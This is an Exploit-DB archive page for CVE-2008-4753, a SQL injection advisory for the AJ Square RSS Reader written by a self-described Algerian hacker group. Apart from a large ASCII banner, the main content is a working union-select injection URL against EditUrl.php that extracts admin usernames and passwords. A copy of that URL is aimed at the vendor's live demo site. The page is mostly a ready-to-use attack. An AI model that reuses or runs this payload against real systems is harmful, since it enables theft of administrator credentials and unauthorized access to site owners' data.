Aj RSS Reader - 'url' SQL Injection

EDB-ID:

6829

CVE:

2008-4753

EDB Verified:

Author:

yassine_enp

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-10-24

Vulnerable App:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: e1np@hotmail.com:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
                =               nome de script :rss_reader
                                                                     =
                ======================================yassine_enp===================================


Exploit(1):
********

www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--

Demo
________

http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--


                                
                                                    

===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::e1np@Hotmail.CoM::::

# milw0rm.com [2008-10-24]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services